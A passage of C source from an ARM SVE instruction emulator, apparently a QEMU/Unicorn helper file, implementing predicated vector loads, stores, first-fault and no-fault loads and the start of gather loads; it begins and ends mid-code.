TYPEE, TYPEM, HOST, MOEND, TLB) \ static void sve_##NAME##_tlb(CPUARMState *env, void *vd, intptr_t reg_off, \ target_ulong addr, TCGMemOpIdx oi, uintptr_t ra) \ { \ TYPEM val = TLB(env, addr, oi, ra); \ *(TYPEE *)((char *)vd + H(reg_off)) = val; \ } #define DO_LD_PRIM_1(NAME, H, TE, TM) \ DO_LD_HOST(NAME, H, TE, TM, ldub_p) \ DO_LD_TLB(NAME, H, TE, TM, ldub_p, 0, helper_ret_ldub_mmu) DO_LD_PRIM_1(ld1bb, H1, uint8_t, uint8_t) DO_LD_PRIM_1(ld1bhu, H1_2, uint16_t, uint8_t) DO_LD_PRIM_1(ld1bhs, H1_2, uint16_t, int8_t) DO_LD_PRIM_1(ld1bsu, H1_4, uint32_t, uint8_t) DO_LD_PRIM_1(ld1bss, H1_4, uint32_t, int8_t) DO_LD_PRIM_1(ld1bdu, , uint64_t, uint8_t) DO_LD_PRIM_1(ld1bds, , uint64_t, int8_t) #define DO_LD_PRIM_2(NAME, end, MOEND, H, TE, TM, PH, PT) \ DO_LD_HOST(NAME##_##end, H, TE, TM, PH##_##end##_p) \ DO_LD_TLB(NAME##_##end, H, TE, TM, PH##_##end##_p, \ MOEND, helper_##end##_##PT##_mmu) DO_LD_PRIM_2(ld1hh, le, MO_LE, H1_2, uint16_t, uint16_t, lduw, lduw) DO_LD_PRIM_2(ld1hsu, le, MO_LE, H1_4, uint32_t, uint16_t, lduw, lduw) DO_LD_PRIM_2(ld1hss, le, MO_LE, H1_4, uint32_t, int16_t, lduw, lduw) DO_LD_PRIM_2(ld1hdu, le, MO_LE, , uint64_t, uint16_t, lduw, lduw) DO_LD_PRIM_2(ld1hds, le, MO_LE, , uint64_t, int16_t, lduw, lduw) DO_LD_PRIM_2(ld1ss, le, MO_LE, H1_4, uint32_t, uint32_t, ldl, ldul) DO_LD_PRIM_2(ld1sdu, le, MO_LE, , uint64_t, uint32_t, ldl, ldul) DO_LD_PRIM_2(ld1sds, le, MO_LE, , uint64_t, int32_t, ldl, ldul) DO_LD_PRIM_2(ld1dd, le, MO_LE, , uint64_t, uint64_t, ldq, ldq) DO_LD_PRIM_2(ld1hh, be, MO_BE, H1_2, uint16_t, uint16_t, lduw, lduw) DO_LD_PRIM_2(ld1hsu, be, MO_BE, H1_4, uint32_t, uint16_t, lduw, lduw) DO_LD_PRIM_2(ld1hss, be, MO_BE, H1_4, uint32_t, int16_t, lduw, lduw) DO_LD_PRIM_2(ld1hdu, be, MO_BE, , uint64_t, uint16_t, lduw, lduw) DO_LD_PRIM_2(ld1hds, be, MO_BE, , uint64_t, int16_t, lduw, lduw) DO_LD_PRIM_2(ld1ss, be, MO_BE, H1_4, uint32_t, uint32_t, ldl, ldul) DO_LD_PRIM_2(ld1sdu, 
be, MO_BE, , uint64_t, uint32_t, ldl, ldul) DO_LD_PRIM_2(ld1sds, be, MO_BE, , uint64_t, int32_t, ldl, ldul) DO_LD_PRIM_2(ld1dd, be, MO_BE, , uint64_t, uint64_t, ldq, ldq) #undef DO_LD_TLB #undef DO_LD_HOST #undef DO_LD_PRIM_1 #undef DO_LD_PRIM_2 /* * Skip through a sequence of inactive elements in the guarding predicate @vg, * beginning at @reg_off bounded by @reg_max. Return the offset of the active * element >= @reg_off, or @reg_max if there were no active elements at all. */ static intptr_t find_next_active(uint64_t *vg, intptr_t reg_off, intptr_t reg_max, int esz) { uint64_t pg_mask = pred_esz_masks[esz]; uint64_t pg = (vg[reg_off >> 6] & pg_mask) >> (reg_off & 63); /* In normal usage, the first element is active. */ if (likely(pg & 1)) { return reg_off; } if (pg == 0) { reg_off &= -64; do { reg_off += 64; if (unlikely(reg_off >= reg_max)) { /* The entire predicate was false. */ return reg_max; } pg = vg[reg_off >> 6] & pg_mask; } while (pg == 0); } reg_off += ctz64(pg); /* We should never see an out of range predicate bit set. */ tcg_debug_assert(reg_off < reg_max); return reg_off; } /* * Return the maximum offset <= @mem_max which is still within the page * referenced by @base + @mem_off. */ static intptr_t max_for_page(struct uc_struct *uc, target_ulong base, intptr_t mem_off, intptr_t mem_max) { target_ulong addr = base + mem_off; intptr_t split = -(intptr_t)(addr | TARGET_PAGE_MASK); return MIN(split, mem_max - mem_off) + mem_off; } /* These are normally defined only for CONFIG_USER_ONLY in <exec/cpu_ldst.h> */ static inline void set_helper_retaddr(uintptr_t ra) { } static inline void clear_helper_retaddr(void) { } /* * The result of tlb_vaddr_to_host for user-only is just g2h(x), * which is always non-null. Elide the useless test. */ static inline bool test_host_page(void *host) { return likely(host != NULL); } /* * Common helper for all contiguous one-register predicated loads. */ static void sve_ld1_r(CPUARMState *env, void *vg, const target_ulong addr, uint32_t desc, const uintptr_t retaddr, const int esz, const int msz, sve_ld1_host_fn *host_fn, sve_ld1_tlb_fn *tlb_fn) { const TCGMemOpIdx oi = extract32(desc, SIMD_DATA_SHIFT, MEMOPIDX_SHIFT); const int mmu_idx = get_mmuidx(oi); const unsigned rd = extract32(desc, SIMD_DATA_SHIFT + MEMOPIDX_SHIFT, 5); void *vd = &env->vfp.zregs[rd]; const int diffsz = esz - msz; const intptr_t reg_max = simd_oprsz(desc); const intptr_t mem_max = reg_max >> diffsz; ARMVectorReg scratch; void *host; intptr_t split, reg_off, mem_off; /* Find the first active element. */ reg_off = find_next_active(vg, 0, reg_max, esz); if (unlikely(reg_off == reg_max)) { /* The entire predicate was false; no load occurs. */ memset(vd, 0, reg_max); return; } mem_off = reg_off >> diffsz; set_helper_retaddr(retaddr); /* * If the (remaining) load is entirely within a single page, then: * For softmmu, and the tlb hits, then no faults will occur; * For user-only, either the first load will fault or none will. * We can thus perform the load directly to the destination and * Vd will be unmodified on any exception path. */ split = max_for_page(env->uc, addr, mem_off, mem_max); if (likely(split == mem_max)) { host = tlb_vaddr_to_host(env, addr + mem_off, MMU_DATA_LOAD, mmu_idx); if (test_host_page(host)) { mem_off = host_fn(vd, vg, (char *)host - mem_off, mem_off, mem_max); tcg_debug_assert(mem_off == mem_max); clear_helper_retaddr(); /* After having taken any fault, zero leading inactive elements. 
*/ swap_memzero(vd, reg_off); return; } } /* * Perform the predicated read into a temporary, thus ensuring * if the load of the last element faults, Vd is not modified. */ memset(&scratch, 0, reg_max); goto start; while (1) { reg_off = find_next_active(vg, reg_off, reg_max, esz); if (reg_off >= reg_max) { break; } mem_off = reg_off >> diffsz; split = max_for_page(env->uc, addr, mem_off, mem_max); start: if (split - mem_off >= (1ULL << msz)) { /* At least one whole element on this page. */ host = tlb_vaddr_to_host(env, addr + mem_off, MMU_DATA_LOAD, mmu_idx); if (host) { mem_off = host_fn(&scratch, vg, (char *)host - mem_off, mem_off, split); reg_off = mem_off << diffsz; continue; } } /* * Perform one normal read. This may fault, longjmping out to the * main loop in order to raise an exception. It may succeed, and * as a side-effect load the TLB entry for the next round. Finally, * in the extremely unlikely case we're performing this operation * on I/O memory, it may succeed but not bring in the TLB entry. * But even then we have still made forward progress. */ tlb_fn(env, &scratch, reg_off, addr + mem_off, oi, retaddr); reg_off += 1ULL << esz; } clear_helper_retaddr(); memcpy(vd, &scratch, reg_max); } #define DO_LD1_1(NAME, ESZ) \ void HELPER(sve_##NAME##_r)(CPUARMState *env, void *vg, \ target_ulong addr, uint32_t desc) \ { \ sve_ld1_r(env, vg, addr, desc, GETPC(), ESZ, 0, \ sve_##NAME##_host, sve_##NAME##_tlb); \ } #define DO_LD1_2(NAME, ESZ, MSZ) \ void HELPER(sve_##NAME##_le_r)(CPUARMState *env, void *vg, \ target_ulong addr, uint32_t desc) \ { \ sve_ld1_r(env, vg, addr, desc, GETPC(), ESZ, MSZ, \ sve_##NAME##_le_host, sve_##NAME##_le_tlb); \ } \ void HELPER(sve_##NAME##_be_r)(CPUARMState *env, void *vg, \ target_ulong addr, uint32_t desc) \ { \ sve_ld1_r(env, vg, addr, desc, GETPC(), ESZ, MSZ, \ sve_##NAME##_be_host, sve_##NAME##_be_tlb); \ } DO_LD1_1(ld1bb, 0) DO_LD1_1(ld1bhu, 1) DO_LD1_1(ld1bhs, 1) DO_LD1_1(ld1bsu, 2) DO_LD1_1(ld1bss, 2) DO_LD1_1(ld1bdu, 3) DO_LD1_1(ld1bds, 3) DO_LD1_2(ld1hh, 1, 1) DO_LD1_2(ld1hsu, 2, 1) DO_LD1_2(ld1hss, 2, 1) DO_LD1_2(ld1hdu, 3, 1) DO_LD1_2(ld1hds, 3, 1) DO_LD1_2(ld1ss, 2, 2) DO_LD1_2(ld1sdu, 3, 2) DO_LD1_2(ld1sds, 3, 2) DO_LD1_2(ld1dd, 3, 3) #undef DO_LD1_1 #undef DO_LD1_2 /* * Common helpers for all contiguous 2,3,4-register predicated loads. */ static void sve_ld2_r(CPUARMState *env, void *vg, target_ulong addr, uint32_t desc, int size, uintptr_t ra, sve_ld1_tlb_fn *tlb_fn) { const TCGMemOpIdx oi = extract32(desc, SIMD_DATA_SHIFT, MEMOPIDX_SHIFT); const unsigned rd = extract32(desc, SIMD_DATA_SHIFT + MEMOPIDX_SHIFT, 5); intptr_t i, oprsz = simd_oprsz(desc); ARMVectorReg scratch[2] = { 0 }; set_helper_retaddr(ra); for (i = 0; i < oprsz; ) { uint16_t pg = *(uint16_t *)((char *)vg + H1_2(i >> 3)); do { if (pg & 1) { tlb_fn(env, &scratch[0], i, addr, oi, ra); tlb_fn(env, &scratch[1], i, addr + size, oi, ra); } i += size, pg >>= size; addr += 2 * size; } while (i & 15); } clear_helper_retaddr(); /* Wait until all exceptions have been raised to write back. 
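 * Loading into the scratch buffers first means a fault on any element
 * longjmps out before the architectural registers are touched.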
*/ memcpy(&env->vfp.zregs[rd], &scratch[0], oprsz); memcpy(&env->vfp.zregs[(rd + 1) & 31], &scratch[1], oprsz); } static void sve_ld3_r(CPUARMState *env, void *vg, target_ulong addr, uint32_t desc, int size, uintptr_t ra, sve_ld1_tlb_fn *tlb_fn) { const TCGMemOpIdx oi = extract32(desc, SIMD_DATA_SHIFT, MEMOPIDX_SHIFT); const unsigned rd = extract32(desc, SIMD_DATA_SHIFT + MEMOPIDX_SHIFT, 5); intptr_t i, oprsz = simd_oprsz(desc); ARMVectorReg scratch[3] = { 0 }; set_helper_retaddr(ra); for (i = 0; i < oprsz; ) { uint16_t pg = *(uint16_t *)((char *)vg + H1_2(i >> 3)); do { if (pg & 1) { tlb_fn(env, &scratch[0], i, addr, oi, ra); tlb_fn(env, &scratch[1], i, addr + size, oi, ra); tlb_fn(env, &scratch[2], i, addr + 2 * size, oi, ra); } i += size, pg >>= size; addr += 3 * size; } while (i & 15); } clear_helper_retaddr(); /* Wait until all exceptions have been raised to write back. */ memcpy(&env->vfp.zregs[rd], &scratch[0], oprsz); memcpy(&env->vfp.zregs[(rd + 1) & 31], &scratch[1], oprsz); memcpy(&env->vfp.zregs[(rd + 2) & 31], &scratch[2], oprsz); } static void sve_ld4_r(CPUARMState *env, void *vg, target_ulong addr, uint32_t desc, int size, uintptr_t ra, sve_ld1_tlb_fn *tlb_fn) { const TCGMemOpIdx oi = extract32(desc, SIMD_DATA_SHIFT, MEMOPIDX_SHIFT); const unsigned rd = extract32(desc, SIMD_DATA_SHIFT + MEMOPIDX_SHIFT, 5); intptr_t i, oprsz = simd_oprsz(desc); ARMVectorReg scratch[4] = { 0 }; set_helper_retaddr(ra); for (i = 0; i < oprsz; ) { uint16_t pg = *(uint16_t *)((char *)vg + H1_2(i >> 3)); do { if (pg & 1) { tlb_fn(env, &scratch[0], i, addr, oi, ra); tlb_fn(env, &scratch[1], i, addr + size, oi, ra); tlb_fn(env, &scratch[2], i, addr + 2 * size, oi, ra); tlb_fn(env, &scratch[3], i, addr + 3 * size, oi, ra); } i += size, pg >>= size; addr += 4 * size; } while (i & 15); } clear_helper_retaddr(); /* Wait until all exceptions have been raised to write back. */ memcpy(&env->vfp.zregs[rd], &scratch[0], oprsz); memcpy(&env->vfp.zregs[(rd + 1) & 31], &scratch[1], oprsz); memcpy(&env->vfp.zregs[(rd + 2) & 31], &scratch[2], oprsz); memcpy(&env->vfp.zregs[(rd + 3) & 31], &scratch[3], oprsz); } #define DO_LDN_1(N) \ void QEMU_FLATTEN HELPER(sve_ld##N##bb_r) \ (CPUARMState *env, void *vg, target_ulong addr, uint32_t desc) \ { \ sve_ld##N##_r(env, vg, addr, desc, 1, GETPC(), sve_ld1bb_tlb); \ } #define DO_LDN_2(N, SUFF, SIZE) \ void QEMU_FLATTEN HELPER(sve_ld##N##SUFF##_le_r) \ (CPUARMState *env, void *vg, target_ulong addr, uint32_t desc) \ { \ sve_ld##N##_r(env, vg, addr, desc, SIZE, GETPC(), \ sve_ld1##SUFF##_le_tlb); \ } \ void QEMU_FLATTEN HELPER(sve_ld##N##SUFF##_be_r) \ (CPUARMState *env, void *vg, target_ulong addr, uint32_t desc) \ { \ sve_ld##N##_r(env, vg, addr, desc, SIZE, GETPC(), \ sve_ld1##SUFF##_be_tlb); \ } DO_LDN_1(2) DO_LDN_1(3) DO_LDN_1(4) DO_LDN_2(2, hh, 2) DO_LDN_2(3, hh, 2) DO_LDN_2(4, hh, 2) DO_LDN_2(2, ss, 4) DO_LDN_2(3, ss, 4) DO_LDN_2(4, ss, 4) DO_LDN_2(2, dd, 8) DO_LDN_2(3, dd, 8) DO_LDN_2(4, dd, 8) #undef DO_LDN_1 #undef DO_LDN_2 /* * Load contiguous data, first-fault and no-fault. * * For user-only, one could argue that we should hold the mmap_lock during * the operation so that there is no race between page_check_range and the * load operation. However, unmapping pages out from under a running thread * is extraordinarily unlikely. This theoretical race condition also affects * linux-user/ in its get_user/put_user macros. 
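 *
 * As a reminder of the semantics: a first-fault load may take a real
 * fault only on the first active element; a fault on any later element
 * merely clears the corresponding FFR bits.  A no-fault load may not
 * fault on any element at all.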
* * TODO: Construct some helpers, written in assembly, that interact with * handle_cpu_signal to produce memory ops which can properly report errors * without racing. */ /* Fault on byte I. All bits in FFR from I are cleared. The vector * result from I is CONSTRAINED UNPREDICTABLE; we choose the MERGE * option, which leaves subsequent data unchanged. */ static void record_fault(CPUARMState *env, uintptr_t i, uintptr_t oprsz) { uint64_t *ffr = env->vfp.pregs[FFR_PRED_NUM].p; if (i & 63) { ffr[i / 64] &= MAKE_64BIT_MASK(0, i & 63); i = ROUND_UP(i, 64); } for (; i < oprsz; i += 64) { ffr[i / 64] = 0; } } /* * Common helper for all contiguous first-fault loads. */ static void sve_ldff1_r(CPUARMState *env, void *vg, const target_ulong addr, uint32_t desc, const uintptr_t retaddr, const int esz, const int msz, sve_ld1_host_fn *host_fn, sve_ld1_tlb_fn *tlb_fn) { const TCGMemOpIdx oi = extract32(desc, SIMD_DATA_SHIFT, MEMOPIDX_SHIFT); const int mmu_idx = get_mmuidx(oi); const unsigned rd = extract32(desc, SIMD_DATA_SHIFT + MEMOPIDX_SHIFT, 5); void *vd = &env->vfp.zregs[rd]; const int diffsz = esz - msz; const intptr_t reg_max = simd_oprsz(desc); const intptr_t mem_max = reg_max >> diffsz; intptr_t split, reg_off, mem_off; void *host; /* Skip to the first active element. */ reg_off = find_next_active(vg, 0, reg_max, esz); if (unlikely(reg_off == reg_max)) { /* The entire predicate was false; no load occurs. */ memset(vd, 0, reg_max); return; } mem_off = reg_off >> diffsz; set_helper_retaddr(retaddr); /* * If the (remaining) load is entirely within a single page, then: * For softmmu, and the tlb hits, then no faults will occur; * For user-only, either the first load will fault or none will. * We can thus perform the load directly to the destination and * Vd will be unmodified on any exception path. */ split = max_for_page(env->uc, addr, mem_off, mem_max); if (likely(split == mem_max)) { host = tlb_vaddr_to_host(env, addr + mem_off, MMU_DATA_LOAD, mmu_idx); if (test_host_page(host)) { mem_off = host_fn(vd, vg, (char *)host - mem_off, mem_off, mem_max); tcg_debug_assert(mem_off == mem_max); clear_helper_retaddr(); /* After any fault, zero any leading inactive elements. */ swap_memzero(vd, reg_off); return; } } /* * Perform one normal read, which will fault or not. * But it is likely to bring the page into the tlb. */ tlb_fn(env, vd, reg_off, addr + mem_off, oi, retaddr); /* After any fault, zero any leading predicated false elts. */ swap_memzero(vd, reg_off); mem_off += 1ULL << msz; reg_off += 1ULL << esz; /* Try again to read the balance of the page. */ split = max_for_page(env->uc, addr, mem_off - 1, mem_max); if (split >= (1ULL << msz)) { host = tlb_vaddr_to_host(env, addr + mem_off, MMU_DATA_LOAD, mmu_idx); if (host) { mem_off = host_fn(vd, vg, (char *)host - mem_off, mem_off, split); reg_off = mem_off << diffsz; } } clear_helper_retaddr(); record_fault(env, reg_off, reg_max); } /* * Common helper for all contiguous no-fault loads. */ static void sve_ldnf1_r(CPUARMState *env, void *vg, const target_ulong addr, uint32_t desc, const int esz, const int msz, sve_ld1_host_fn *host_fn) { const unsigned rd = extract32(desc, SIMD_DATA_SHIFT + MEMOPIDX_SHIFT, 5); void *vd = &env->vfp.zregs[rd]; const int diffsz = esz - msz; const intptr_t reg_max = simd_oprsz(desc); const intptr_t mem_max = reg_max >> diffsz; const int mmu_idx = cpu_mmu_index(env, false); intptr_t split, reg_off, mem_off; void *host; /* There will be no fault, so we may modify in advance. 
*/ memset(vd, 0, reg_max); /* Skip to the first active element. */ reg_off = find_next_active(vg, 0, reg_max, esz); if (unlikely(reg_off == reg_max)) { /* The entire predicate was false; no load occurs. */ return; } mem_off = reg_off >> diffsz; /* * If the address is not in the TLB, we have no way to bring the * entry into the TLB without also risking a fault. Note that * the corollary is that we never load from an address not in RAM. * * This last is out of spec, in a weird corner case. * Per the MemNF/MemSingleNF pseudocode, a NF load from Device memory * must not actually hit the bus -- it returns UNKNOWN data instead. * But if you map non-RAM with Normal memory attributes and do a NF * load then it should access the bus. (Nobody ought actually do this * in the real world, obviously.) * * Then there are the annoying special cases with watchpoints... * TODO: Add a form of non-faulting loads using cc->tlb_fill(probe=true). */ host = tlb_vaddr_to_host(env, addr + mem_off, MMU_DATA_LOAD, mmu_idx); split = max_for_page(env->uc, addr, mem_off, mem_max); if (host && split >= (1ULL << msz)) { mem_off = host_fn(vd, vg, (char *)host - mem_off, mem_off, split); reg_off = mem_off << diffsz; } record_fault(env, reg_off, reg_max); } #define DO_LDFF1_LDNF1_1(PART, ESZ) \ void HELPER(sve_ldff1##PART##_r)(CPUARMState *env, void *vg, \ target_ulong addr, uint32_t desc) \ { \ sve_ldff1_r(env, vg, addr, desc, GETPC(), ESZ, 0, \ sve_ld1##PART##_host, sve_ld1##PART##_tlb); \ } \ void HELPER(sve_ldnf1##PART##_r)(CPUARMState *env, void *vg, \ target_ulong addr, uint32_t desc) \ { \ sve_ldnf1_r(env, vg, addr, desc, ESZ, 0, sve_ld1##PART##_host); \ } #define DO_LDFF1_LDNF1_2(PART, ESZ, MSZ) \ void HELPER(sve_ldff1##PART##_le_r)(CPUARMState *env, void *vg, \ target_ulong addr, uint32_t desc) \ { \ sve_ldff1_r(env, vg, addr, desc, GETPC(), ESZ, MSZ, \ sve_ld1##PART##_le_host, sve_ld1##PART##_le_tlb); \ } \ void HELPER(sve_ldnf1##PART##_le_r)(CPUARMState *env, void *vg, \ target_ulong addr, uint32_t desc) \ { \ sve_ldnf1_r(env, vg, addr, desc, ESZ, MSZ, sve_ld1##PART##_le_host); \ } \ void HELPER(sve_ldff1##PART##_be_r)(CPUARMState *env, void *vg, \ target_ulong addr, uint32_t desc) \ { \ sve_ldff1_r(env, vg, addr, desc, GETPC(), ESZ, MSZ, \ sve_ld1##PART##_be_host, sve_ld1##PART##_be_tlb); \ } \ void HELPER(sve_ldnf1##PART##_be_r)(CPUARMState *env, void *vg, \ target_ulong addr, uint32_t desc) \ { \ sve_ldnf1_r(env, vg, addr, desc, ESZ, MSZ, sve_ld1##PART##_be_host); \ } DO_LDFF1_LDNF1_1(bb, 0) DO_LDFF1_LDNF1_1(bhu, 1) DO_LDFF1_LDNF1_1(bhs, 1) DO_LDFF1_LDNF1_1(bsu, 2) DO_LDFF1_LDNF1_1(bss, 2) DO_LDFF1_LDNF1_1(bdu, 3) DO_LDFF1_LDNF1_1(bds, 3) DO_LDFF1_LDNF1_2(hh, 1, 1) DO_LDFF1_LDNF1_2(hsu, 2, 1) DO_LDFF1_LDNF1_2(hss, 2, 1) DO_LDFF1_LDNF1_2(hdu, 3, 1) DO_LDFF1_LDNF1_2(hds, 3, 1) DO_LDFF1_LDNF1_2(ss, 2, 2) DO_LDFF1_LDNF1_2(sdu, 3, 2) DO_LDFF1_LDNF1_2(sds, 3, 2) DO_LDFF1_LDNF1_2(dd, 3, 3) #undef DO_LDFF1_LDNF1_1 #undef DO_LDFF1_LDNF1_2 /* * Store contiguous data, protected by a governing predicate. 
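 *
 * Unlike the loads above, stores need no scratch buffer: nothing is
 * written back to the register file, and the architecture permits a
 * store that faults part-way through to have already written its
 * earlier elements to memory.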
*/ #define DO_ST_TLB(NAME, H, TYPEM, HOST, MOEND, TLB) \ static void sve_##NAME##_tlb(CPUARMState *env, void *vd, intptr_t reg_off, \ target_ulong addr, TCGMemOpIdx oi, uintptr_t ra) \ { \ TLB(env, addr, *(TYPEM *)((char *)vd + H(reg_off)), oi, ra); \ } DO_ST_TLB(st1bb, H1, uint8_t, stb_p, 0, helper_ret_stb_mmu) DO_ST_TLB(st1bh, H1_2, uint16_t, stb_p, 0, helper_ret_stb_mmu) DO_ST_TLB(st1bs, H1_4, uint32_t, stb_p, 0, helper_ret_stb_mmu) DO_ST_TLB(st1bd, , uint64_t, stb_p, 0, helper_ret_stb_mmu) DO_ST_TLB(st1hh_le, H1_2, uint16_t, stw_le_p, MO_LE, helper_le_stw_mmu) DO_ST_TLB(st1hs_le, H1_4, uint32_t, stw_le_p, MO_LE, helper_le_stw_mmu) DO_ST_TLB(st1hd_le, , uint64_t, stw_le_p, MO_LE, helper_le_stw_mmu) DO_ST_TLB(st1ss_le, H1_4, uint32_t, stl_le_p, MO_LE, helper_le_stl_mmu) DO_ST_TLB(st1sd_le, , uint64_t, stl_le_p, MO_LE, helper_le_stl_mmu) DO_ST_TLB(st1dd_le, , uint64_t, stq_le_p, MO_LE, helper_le_stq_mmu) DO_ST_TLB(st1hh_be, H1_2, uint16_t, stw_be_p, MO_BE, helper_be_stw_mmu) DO_ST_TLB(st1hs_be, H1_4, uint32_t, stw_be_p, MO_BE, helper_be_stw_mmu) DO_ST_TLB(st1hd_be, , uint64_t, stw_be_p, MO_BE, helper_be_stw_mmu) DO_ST_TLB(st1ss_be, H1_4, uint32_t, stl_be_p, MO_BE, helper_be_stl_mmu) DO_ST_TLB(st1sd_be, , uint64_t, stl_be_p, MO_BE, helper_be_stl_mmu) DO_ST_TLB(st1dd_be, , uint64_t, stq_be_p, MO_BE, helper_be_stq_mmu) #undef DO_ST_TLB /* * Common helpers for all contiguous 1,2,3,4-register predicated stores. */ static void sve_st1_r(CPUARMState *env, void *vg, target_ulong addr, uint32_t desc, const uintptr_t ra, const int esize, const int msize, sve_st1_tlb_fn *tlb_fn) { const TCGMemOpIdx oi = extract32(desc, SIMD_DATA_SHIFT, MEMOPIDX_SHIFT); const unsigned rd = extract32(desc, SIMD_DATA_SHIFT + MEMOPIDX_SHIFT, 5); intptr_t i, oprsz = simd_oprsz(desc); void *vd = &env->vfp.zregs[rd]; set_helper_retaddr(ra); for (i = 0; i < oprsz; ) { uint16_t pg = *(uint16_t *)((char *)vg + H1_2(i >> 3)); do { if (pg & 1) { tlb_fn(env, vd, i, addr, oi, ra); } i += esize, pg >>= esize; addr += msize; } while (i & 15); } clear_helper_retaddr(); } static void sve_st2_r(CPUARMState *env, void *vg, target_ulong addr, uint32_t desc, const uintptr_t ra, const int esize, const int msize, sve_st1_tlb_fn *tlb_fn) { const TCGMemOpIdx oi = extract32(desc, SIMD_DATA_SHIFT, MEMOPIDX_SHIFT); const unsigned rd = extract32(desc, SIMD_DATA_SHIFT + MEMOPIDX_SHIFT, 5); intptr_t i, oprsz = simd_oprsz(desc); void *d1 = &env->vfp.zregs[rd]; void *d2 = &env->vfp.zregs[(rd + 1) & 31]; set_helper_retaddr(ra); for (i = 0; i < oprsz; ) { uint16_t pg = *(uint16_t *)((char *)vg + H1_2(i >> 3)); do { if (pg & 1) { tlb_fn(env, d1, i, addr, oi, ra); tlb_fn(env, d2, i, addr + msize, oi, ra); } i += esize, pg >>= esize; addr += 2 * msize; } while (i & 15); } clear_helper_retaddr(); } static void sve_st3_r(CPUARMState *env, void *vg, target_ulong addr, uint32_t desc, const uintptr_t ra, const int esize, const int msize, sve_st1_tlb_fn *tlb_fn) { const TCGMemOpIdx oi = extract32(desc, SIMD_DATA_SHIFT, MEMOPIDX_SHIFT); const unsigned rd = extract32(desc, SIMD_DATA_SHIFT + MEMOPIDX_SHIFT, 5); intptr_t i, oprsz = simd_oprsz(desc); void *d1 = &env->vfp.zregs[rd]; void *d2 = &env->vfp.zregs[(rd + 1) & 31]; void *d3 = &env->vfp.zregs[(rd + 2) & 31]; set_helper_retaddr(ra); for (i = 0; i < oprsz; ) { uint16_t pg = *(uint16_t *)((char *)vg + H1_2(i >> 3)); do { if (pg & 1) { tlb_fn(env, d1, i, addr, oi, ra); tlb_fn(env, d2, i, addr + msize, oi, ra); tlb_fn(env, d3, i, addr + 2 * msize, oi, ra); } i += esize, pg >>= esize; addr += 3 * msize; } while 
(i & 15); } clear_helper_retaddr(); } static void sve_st4_r(CPUARMState *env, void *vg, target_ulong addr, uint32_t desc, const uintptr_t ra, const int esize, const int msize, sve_st1_tlb_fn *tlb_fn) { const TCGMemOpIdx oi = extract32(desc, SIMD_DATA_SHIFT, MEMOPIDX_SHIFT); const unsigned rd = extract32(desc, SIMD_DATA_SHIFT + MEMOPIDX_SHIFT, 5); intptr_t i, oprsz = simd_oprsz(desc); void *d1 = &env->vfp.zregs[rd]; void *d2 = &env->vfp.zregs[(rd + 1) & 31]; void *d3 = &env->vfp.zregs[(rd + 2) & 31]; void *d4 = &env->vfp.zregs[(rd + 3) & 31]; set_helper_retaddr(ra); for (i = 0; i < oprsz; ) { uint16_t pg = *(uint16_t *)((char *)vg + H1_2(i >> 3)); do { if (pg & 1) { tlb_fn(env, d1, i, addr, oi, ra); tlb_fn(env, d2, i, addr + msize, oi, ra); tlb_fn(env, d3, i, addr + 2 * msize, oi, ra); tlb_fn(env, d4, i, addr + 3 * msize, oi, ra); } i += esize, pg >>= esize; addr += 4 * msize; } while (i & 15); } clear_helper_retaddr(); } #define DO_STN_1(N, NAME, ESIZE) \ void QEMU_FLATTEN HELPER(sve_st##N##NAME##_r) \ (CPUARMState *env, void *vg, target_ulong addr, uint32_t desc) \ { \ sve_st##N##_r(env, vg, addr, desc, GETPC(), ESIZE, 1, \ sve_st1##NAME##_tlb); \ } #define DO_STN_2(N, NAME, ESIZE, MSIZE) \ void QEMU_FLATTEN HELPER(sve_st##N##NAME##_le_r) \ (CPUARMState *env, void *vg, target_ulong addr, uint32_t desc) \ { \ sve_st##N##_r(env, vg, addr, desc, GETPC(), ESIZE, MSIZE, \ sve_st1##NAME##_le_tlb); \ } \ void QEMU_FLATTEN HELPER(sve_st##N##NAME##_be_r) \ (CPUARMState *env, void *vg, target_ulong addr, uint32_t desc) \ { \ sve_st##N##_r(env, vg, addr, desc, GETPC(), ESIZE, MSIZE, \ sve_st1##NAME##_be_tlb); \ } DO_STN_1(1, bb, 1) DO_STN_1(1, bh, 2) DO_STN_1(1, bs, 4) DO_STN_1(1, bd, 8) DO_STN_1(2, bb, 1) DO_STN_1(3, bb, 1) DO_STN_1(4, bb, 1) DO_STN_2(1, hh, 2, 2) DO_STN_2(1, hs, 4, 2) DO_STN_2(1, hd, 8, 2) DO_STN_2(2, hh, 2, 2) DO_STN_2(3, hh, 2, 2) DO_STN_2(4, hh, 2, 2) DO_STN_2(1, ss, 4, 4) DO_STN_2(1, sd, 8, 4) DO_STN_2(2, ss, 4, 4) DO_STN_2(3, ss, 4, 4) DO_STN_2(4, ss, 4, 4) DO_STN_2(1, dd, 8, 8) DO_STN_2(2, dd, 8, 8) DO_STN_2(3, dd, 8, 8) DO_STN_2(4, dd, 8, 8) #undef DO_STN_1 #undef DO_STN_2 /* * Loads with a vector index. */ /* * Load the element at @reg + @reg_ofs, sign or zero-extend as needed. 
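 * For example, off_zss_d() below truncates a 64-bit element to its low
 * 32 bits and sign-extends it (the "sxtw" offset form); the caller then
 * forms the address as base + (off << scale).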
*/ typedef target_ulong zreg_off_fn(void *reg, intptr_t reg_ofs); static target_ulong off_zsu_s(void *reg, intptr_t reg_ofs) { return *(uint32_t *)((char *)reg + H1_4(reg_ofs)); } static target_ulong off_zss_s(void *reg, intptr_t reg_ofs) { return *(int32_t *)((char *)reg + H1_4(reg_ofs)); } static target_ulong off_zsu_d(void *reg, intptr_t reg_ofs) { return (uint32_t)*(uint64_t *)((char *)reg + reg_ofs); } static target_ulong off_zss_d(void *reg, intptr_t reg_ofs) { return (int32_t)*(uint64_t *)((char *)reg + reg_ofs); } static target_ulong off_zd_d(void *reg, intptr_t reg_ofs) { return *(uint64_t *)((char *)reg + reg_ofs); } static void sve_ld1_zs(CPUARMState *env, void *vd, void *vg, void *vm, target_ulong base, uint32_t desc, uintptr_t ra, zreg_off_fn *off_fn, sve_ld1_tlb_fn *tlb_fn) { const TCGMemOpIdx oi = extract32(desc, SIMD_DATA_SHIFT, MEMOPIDX_SHIFT); const int scale = extract32(desc, SIMD_DATA_SHIFT + MEMOPIDX_SHIFT, 2); intptr_t i, oprsz = simd_oprsz(desc); ARMVectorReg scratch = { 0 }; set_helper_retaddr(ra); for (i = 0; i < oprsz; ) { uint16_t pg = *(uint16_t *)((char *)vg + H1_2(i >> 3)); do { if (likely(pg & 1)) { target_ulong off = off_fn(vm, i); tlb_fn(env, &scratch, i, base + (off << scale), oi, ra); } i += 4, pg >>= 4; } while (i & 15); } 